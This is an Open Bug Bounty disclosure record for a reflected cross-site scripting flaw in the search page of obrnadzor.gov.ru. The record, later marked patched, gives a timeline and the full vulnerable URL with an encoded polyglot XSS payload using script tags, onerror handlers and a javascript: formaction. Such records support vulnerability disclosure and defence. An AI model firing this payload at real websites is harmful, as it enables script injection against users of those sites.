obrnadzor.gov.ru XSS vulnerability

2017-12-03T02:30:00
ID OBB:447145
Type openbugbounty
Reporter kongwenbin
Modified 2018-01-02T20:42:00

Description

Vulnerable URL:
http://obrnadzor.gov.ru/ru/search/?q_4=%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%28%2Fopenbugbounty%2F%29%3E%3C%2Fmarquee%3E%22+%3E%3C%2Fplaintext%5C%3E%3C%2F%7C%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%28%2Fopenbugbounty%2F%29+%3E%3Cscript%3Eprompt%28%2Fopenbugbounty%2F%29%3C%2Fscript%3E%40gmail.com%3Cisindex+formaction%3Djavascript%3Aalert%28%2FXSS%2F%29+type%3Dsubmit%3E%27--%3E%22+%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fopenbugbounty%2F%29%3C%2Fscript%3E%22%3E%3Cimg%2Fid%3D%22confirm%26lpar%3B+1%29%22%2Falt%3D%22%2F%22src%3D%22%2F%22onerror%3Deval%28id%26%2523x29%3B%3E%27%22%3E%3Cimg+src%3D%22http%3A+%2F%2Fi.imgur.com%2FP8mL8.jpg%22%3E&ps;_4=10&ul;_4=1017&wm;_4=0&sp;_4=0&sy;_4=0&m;_4=0
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 101813
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 3 December, 2017 02:30 GMT
Generic security notifications sent to website owner| 3 December, 2017 02:33 GMT
Vulnerability details disclosed by researcher| 2 January, 2018 03:25 GMT
Vulnerability patched by the website owner| 2 January, 2018 20:42 GMT